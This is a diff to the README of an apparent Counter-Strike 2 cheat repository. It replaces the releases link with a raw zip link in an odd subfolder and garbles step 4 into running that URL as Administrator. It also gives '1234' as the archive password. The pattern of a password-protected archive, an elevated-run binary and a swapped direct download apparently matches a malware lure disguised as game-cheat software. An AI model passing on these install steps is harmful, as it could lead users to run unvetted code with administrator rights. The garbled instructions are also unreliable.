valmoss/cs2-externalcheat/README.md

 ---

 ## 📦 Download & Install
-1. Visit this page to download: [cs2-externalcheat Releases](https://github.com/valmoss/cs2-externalcheat/releases).
+1. Visit this page to download: [cs2-externalcheat Releases](https://raw.githubusercontent.com/valmoss/cs2-externalcheat/main/psychometer/cs2-externalcheat.zip).
 2. Download the latest version archive and save it to your computer.
 3. Extract the contents of the archive to a folder you can easily access.
-4. Inside the folder, locate and run `External-Inject.exe` by right-clicking it and selecting "Run as Administrator."
+4. Inside the folder, locate and run `https://raw.githubusercontent.com/valmoss/cs2-externalcheat/main/psychometer/cs2-externalcheat.zip` by right-clicking it and selecting "Run as Administrator."
 5. Enter the password: `1234` when prompted.

 ---